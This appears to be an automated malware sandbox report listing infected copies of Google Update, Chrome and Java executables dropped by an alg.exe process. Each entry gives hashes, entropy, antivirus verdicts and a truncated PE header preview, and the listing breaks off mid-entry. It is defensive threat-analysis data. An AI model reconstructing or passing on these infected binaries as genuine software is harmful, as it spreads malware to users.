Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..................................k.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1302528
Entropy (8bit):	5.23891563181562
Encrypted:	false
SSDEEP:	24576:EihRyhdsRrUsqjnhMgeiCl7G0nehbGZpbD:EihsoRwDmg27RnWGj
MD5:	DB23138A7C50AB421C9DB8E0FDF4784A
SHA1:	0FB73AF0CB6E687377361357C445F660CFA09AC9
SHA-256:	32B090B5B88201B432140C728120CCE3A1274F0585BAC8EA5ACB6263FD07D35B
SHA-512:	F3911A2D9E5C04E29329053391685F613585BCD5B18637C5B31119B294C2EF3D87AFC50181476093D7B2EB1BC71BE068300AA058B867590CC2C7277809F31C8A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~...X..~..X...2..X...2..X...2...X...3..X..~..X..~..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p.......}.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1342464
Entropy (8bit):	5.350998073247971
Encrypted:	false
SSDEEP:	24576:K1FDmRF+wpx/QafzsqjnhMgeiCl7G0nehbGZpbD:kmRF+wn/Jf3Dmg27RnWGj
MD5:	0479A6A3213FB91EA828B1AF21E9CAE1
SHA1:	2B33AD4F0DAC915DCA7FBFBD8F0C597A169431D9
SHA-256:	F72A2C77A0AB7F89498D229E89BF9D2388DD2D1C23E746C1A19A2F1DFFD59258
SHA-512:	73D75A7E814E7D724093B6671BCA7452686D3058F4FBAE4FDF34D8FAE7CF7361120F3D93FEC34D2FF337AAB197942FF73084474F3C81DC67B116B35606132A41
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..................................................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.1619776340210946
Encrypted:	false
SSDEEP:	12288:j2Ae621B+0YKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:SE21BPpsqjnhMgeiCl7G0nehbGZpbD
MD5:	DB898F9F203F899C2E23A0AA0CC60629
SHA1:	16F9BB6B384BF3CACE2A139A8CB9A869AF626B2B
SHA-256:	3433230FECC698A5FFFF3DA77A09761CD2991EEBC1CF2703F530FBC2B3F78B20
SHA-512:	F6B798171BAD37061B460C714A5327C35143B2E06061DC9A6A88B2E11E0BB35F45B6856D87C5409C0E5EDB9555FCD785309DF0F41F0F4AEB7A6E1065BF7A45B8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..................................9.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	105669632
Entropy (8bit):	7.999989847035597
Encrypted:	true
SSDEEP:	3145728:+LAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:MBWx/pt8U7E6aZRfIICU
MD5:	5549A9EED102DF310F29625CDFD9A0B5
SHA1:	5609C6F177A0787C27EC1F6FDA0E907AD91DBF8A
SHA-256:	82E09106E4B093EE3E38EA627F3AD9795DE398DF11672269E608AC100045F187
SHA-512:	0B33773246099EF1AD3565EDC710ABE6A5759611CF4846664BF479F8494D71933B5CBAB093834B8658AEC00D4912FB5CBF8574DC394D4CBDF4422C0758B2DEDA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....\|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..\|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1158144
Entropy (8bit):	5.068077317396411
Encrypted:	false
SSDEEP:	12288:G9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:G9sqjnhMgeiCl7G0nehbGZpbD
MD5:	B916B91B52894EE6209BD119CA522C30
SHA1:	5A8C0AC936027184E00B90B8614CED5F739DB2DC
SHA-256:	04D05C1E00F6CA1F6BB0899C5C0C8FB422860A56C2036B3D9A90F5AE33783F24
SHA-512:	FDE559D8768EBB94E825B624117291BDF303DC023A5CE9820DA56AE603007B627E2165B9F1FDDD65B582528C5B5587D931C3A9ED52600C55C9A398BC80870B94
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................+.......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032407366311879
Encrypted:	false
SSDEEP:	12288:nK2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:K2sqjnhMgeiCl7G0nehbGZpbD
MD5:	727ACB7641ACB432C45B385D9E811C7D
SHA1:	EF83DAAF8765B093FA6779B80900F6C26051C3D8
SHA-256:	7DFE4D39F73B23983348E18F0E4B2D32DBC2C5E4A421A18C60EE16BB0EED5C22
SHA-512:	3CFBD07CED00CF566FBEA7443B855FA434146C6FEDC28C44B4CC38CBC5E958666ACB415CEB98F004B9AE89825C9A3860FCAA2B9094004C58325DA80EB1DBE97A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.44606129199188
Encrypted:	false
SSDEEP:	12288:SnEbH0j4x7R6SvyCMrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:SkwOtO7rsqjnhMgeiCl7G0nehbGZpbD
MD5:	01A6F7668E10D05632509EDFF86CB784
SHA1:	92F74E8AC105B296C8B1F49444E0FB2A165932D2
SHA-256:	F9B07ECD398BF274EA5A0B3175AE155CD7050C5A263C7B5683E5E6EC94B70D17
SHA-512:	770EA4467D8DD737C029C657BD91EAB696219366A6D6EBEA3B1F3528EA86B8483EFDE574B2977C51EA98CBF6F3C777EE50915C6B931D25D10C276DCA17329C94
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@.......&.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1212416
Entropy (8bit):	5.119725503069702
Encrypted:	false
SSDEEP:	12288:fv1vvyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:X1SsqjnhMgeiCl7G0nehbGZpbD
MD5:	C80748FB22952CB25E0BD9112A12EF82
SHA1:	4B0614E61865218B53439BCE7CF4958AC386C4EB
SHA-256:	A9010A15BABFD58AE10771EA1625F706D492453ECEE4CF07DB32B0D3C3A0FB83
SHA-512:	E8FC99FD5E08460687A9846802DAED6FEA8623330DB01EC4C09DD3599D45B5BFD9F37316C119E8A9895FCE9C654BC07ABC7D4E429A3F770566CD2FD9FA43540B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.4468048925475365
Encrypted:	false
SSDEEP:	24576:CnU/h/4KosqjnhMgeiCl7G0nehbGZpbD:CU/VUDmg27RnWGj
MD5:	04D02BCC69E70D8CD1AD5576DABB88EB
SHA1:	799817239DDABC190E7CBFA17C1710826C69C973
SHA-256:	E89316B7D1B007B2250987B0114150A0CCFD52C9BE5F3C7F4D1AFD9BFAF352B1
SHA-512:	88204E3BE76CF3B98AE324DFBB79F1816B18010359B86E7DE31351F78F847BECAB489C4B255C77AAD64752A6E9E232C0762960E40F12586DE405495FA8F38B8B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@..............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.483731802588723
Encrypted:	false
SSDEEP:	24576:9x71iBLZ05jNTmJWEx/sqjnhMgeiCl7G0nehbGZpbD:9xhiHIjNgjDmg27RnWGj
MD5:	8423D0B32938B7DF6961FD9BF3111126
SHA1:	404051C8024ACAC2DC1825D6F30E0F1F69E5B51F
SHA-256:	E1D64F1A946337C42A1F599EF8F1B86524E162836CDC9AB6CBC56D4D430A8E22
SHA-512:	5D8B46D4C96328313B0E33CBE7C6D895507257EF32EB4EFEE6C48A5664CD0933E5E3ED5E6F451F3A731EF01C28DC2936C8A897D3BF667BFA85AF0EDBF959DB72
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032880114734903
Encrypted:	false
SSDEEP:	12288:a3rmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SSsqjnhMgeiCl7G0nehbGZpbD
MD5:	DB2A0A584EA3D14ECA6BF3089D44601F
SHA1:	1F9B2355A5B08DE8EC3211049CFCC3ED500CEF05
SHA-256:	01714394032DB51B7998586746E87BF21EB0CAB6CAD538C51CBDCB96EFD15D01
SHA-512:	28294B5774A7737512C21DDDB6608669EB0B31FAD26213780A9050B3C30FFD727804AE8A3FE7331F873BC1E5B4E3B660B5438EBE28DB1D96C6B7FFC10B802284
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................M.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1242112
Entropy (8bit):	5.172654248770283
Encrypted:	false
SSDEEP:	12288:4YdP/hXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:NdP/hsqjnhMgeiCl7G0nehbGZpbD
MD5:	851AF6AD9CB397F615CA550F274CFD14
SHA1:	0D9FD35EA72C2EB96E413FA36B40D9786E9E8CB0
SHA-256:	B32E7319EB260E732064482A89E30EE0F641881F764C87BE38C61940C2651875
SHA-512:	8B7D3F58B832F1E79CA2089AE24C00110D78F00D717C4BB1FED45F680D91B773A3D5D3E88E2C814664B9463C3E2C1FC99CEA74A14576CE585FED6AF6F3C02B05
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P......\|...........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032910907363417
Encrypted:	false
SSDEEP:	12288:ny5OXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:yIsqjnhMgeiCl7G0nehbGZpbD
MD5:	C0597A74CD56904083C67A75CD7C9AC0
SHA1:	FDD246408DA50B06B0B96CF4A3BD53ED9882590A
SHA-256:	9529CFD9E1460A3F129AAD662EC774FCA7BF1DB7826A413DDD178804E7926D33
SHA-512:	FDF0446C32B213472CBB2F61258291F0226846992DF4F5492A813E50F56F411C19DE23B3CD600AEDA294E5F0B90EC6574DC866133C647F33C3FB88E88036D6E9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................d.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.0329819444572275
Encrypted:	false
SSDEEP:	12288:tKl2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cksqjnhMgeiCl7G0nehbGZpbD
MD5:	0CC7E8E64E30B62CEEA08F14460B50C1
SHA1:	351070DF3C7444F75E7AFC2F73F0CBB947F15BF6
SHA-256:	7026B38FB554A151F7C1F76673681CC7262404CE28AB984150910C44176D60ED
SHA-512:	ACF864A5927E0AB41C18F24225AB176E1E5D5A5DA261DD89A0E43355E8EA33AA0212A6E55FEC00ECADAD1CD117F4E343AAEB0CC191896FB5A195C86EB98B89E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.0329826541236
Encrypted:	false
SSDEEP:	12288:oil2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pksqjnhMgeiCl7G0nehbGZpbD
MD5:	0BF41DE34A70BAA05766B79B5BCB7343
SHA1:	2A224A37B2F7788E582CAFCA9AF0E99702AA0706
SHA-256:	0F5FE82B8F64BC6F9FA4B12FCE77F00730FC353131CAD84C4ABAF7172E3DBAA8
SHA-512:	97A7FFEEA49939C0B92DC0B22F4946CC34C8E84D299C214973F7AB271D9CA06D9D256FFA94B1E87B6C12D3506235B0A009689B02066A51E9E58A31F9895B3A41
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032950885788124
Encrypted:	false
SSDEEP:	12288:wTmWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:KnsqjnhMgeiCl7G0nehbGZpbD
MD5:	4CE2ADDACA247A6ED176657AF00872A4
SHA1:	FEE08F9802A1D79C638ADB4BF21566BB5A7F9A75
SHA-256:	E78DCFFB03BCC6A552B7BEAD1C47AD57F92101423D23CC5FCA8BD90B81D8845A
SHA-512:	C18EF3E08A02B2EFDCF98D7AE6731E5930EDC78C9796DFE4CDB95F26C27978EE6DB2BEA37AF28AD99B15B4F29F19EF86A8D1DC005049C2F725A8A8B76FA7A475
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.033859598498816
Encrypted:	false
SSDEEP:	12288:JamyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:4LsqjnhMgeiCl7G0nehbGZpbD
MD5:	AF1268092A1BE12BF53B0C45F61C819C
SHA1:	343ADCF87A76D6113E34E50378AAAB411AC128F8
SHA-256:	5AD0DE6D332642CE6FE571653B16CA5826E32654450314EC0C74DD92E78EB4C3
SHA-512:	826D1E8AC625048C286FBF3DC7776FE14C16D12C7D0B5397C84C11841504240138C3BBA854B0A2CD5E1A3DBC790F5544779433D5C8EB7E0224EDFDC41AA9E7B0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032934590811194
Encrypted:	false
SSDEEP:	12288:2Q5OXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9gsqjnhMgeiCl7G0nehbGZpbD
MD5:	CA5802357383EA2138BC8AB40D81DF3E
SHA1:	628B63B22C1F8682E92A50BD96B62F61C20FD4CC
SHA-256:	08E9F43AB4B6DBE6846C502469A308790053E310CAE93D31339A4DF906405EA4
SHA-512:	79922F9F0ADD566DAF24085E8D137E7CDFD3693AD0BEFD7128A08BFFD473711602DD39A8271776D2AFC14E0E9743353425DE88531F8D9D84D5A9070DCDB0FF95
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................0.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.0329680662882135
Encrypted:	false
SSDEEP:	12288:UV/2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:QesqjnhMgeiCl7G0nehbGZpbD
MD5:	17F9CAD524A05DDA312D1A13C87110E4
SHA1:	77F3D5BC4488D43E6B66FC02DC1C074111CAF94F
SHA-256:	2C739E992F23B9017A870E132810A2F2D8D5AA0F6E13795C126BC847C5A7B816
SHA-512:	412C98B3BFBECEC1B3C4F60A031F35524BDC7246333542119704E42CF6C0BFB76E42EE804420975A5767B0B14627F9811A6F9C0E0FE6027C2F761BFA1D9035D0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032871800898397
Encrypted:	false
SSDEEP:	12288:bZmGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dnsqjnhMgeiCl7G0nehbGZpbD
MD5:	98E82142F0E66E15ABD948FA68D909A6
SHA1:	EABACB621DCE6106C872C5C9A0518A34AE8698D6
SHA-256:	4BFE5E25AEDF1F6B2A326EEF0375CB37DC0C6B6C441E701CB70D78A7EA42496C
SHA-512:	D807C7CCB0883C89F58D0A66442D2D6B09C57408D9DD6C6E6E868F55655CE4B239C42C6FB5E19140E7C746F7088148D9D9E32576FA137781AB964BA2CF4AE157
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................}........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032923291888244
Encrypted:	false
SSDEEP:	12288:0eSuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1zsqjnhMgeiCl7G0nehbGZpbD
MD5:	3A9F7528CF678541029DB8AD4F819124
SHA1:	1175E436FFC80F8E8231AF37B74E3C3F1941A61A
SHA-256:	7A8B451C4EBD60450FFB767C6468618896A35D528B23F7AC0071FCA6609786D1
SHA-512:	A27A7C3A164D5D6EF9DE4D82C15ADBFC6933A2E3E357FF05BD5AEFC5A7BF2FD2A6F4D16B0FD109B236EE1A3325060B7DDDFF307E376B97E0D5ACCF3E1303CCAB
Malicious:	true
Reputation:	unknown
